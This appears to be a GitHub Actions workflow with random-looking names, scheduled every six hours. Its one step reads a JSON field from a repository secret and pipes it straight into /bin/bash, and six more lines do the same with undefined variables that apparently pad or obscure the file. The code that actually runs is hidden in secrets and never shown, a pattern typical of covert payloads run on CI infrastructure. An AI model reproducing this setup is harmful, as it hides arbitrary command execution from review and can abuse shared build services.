name: caocao19870104

on:
  workflow_dispatch:
  schedule:
    - cron: '48 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caocao19870104
        env:
          dxwib8320: ${{ secrets.dxwib8320 }}
        run: |
          echo $dxwib8320 | jq -r .apko7389 | /bin/bash
          echo $aj17 | jq -r .sx84 | /bin/bash
          echo $taeo24745 | jq -r .byru11738 | /bin/bash
          echo $mff53 | jq -r .xbcsn821 | /bin/bash
          echo $qw63 | jq -r .i85706 | /bin/bash
          echo $w32779 | jq -r .usyr39477 | /bin/bash
          echo $koq351 | jq -r .easqc18 | /bin/bash

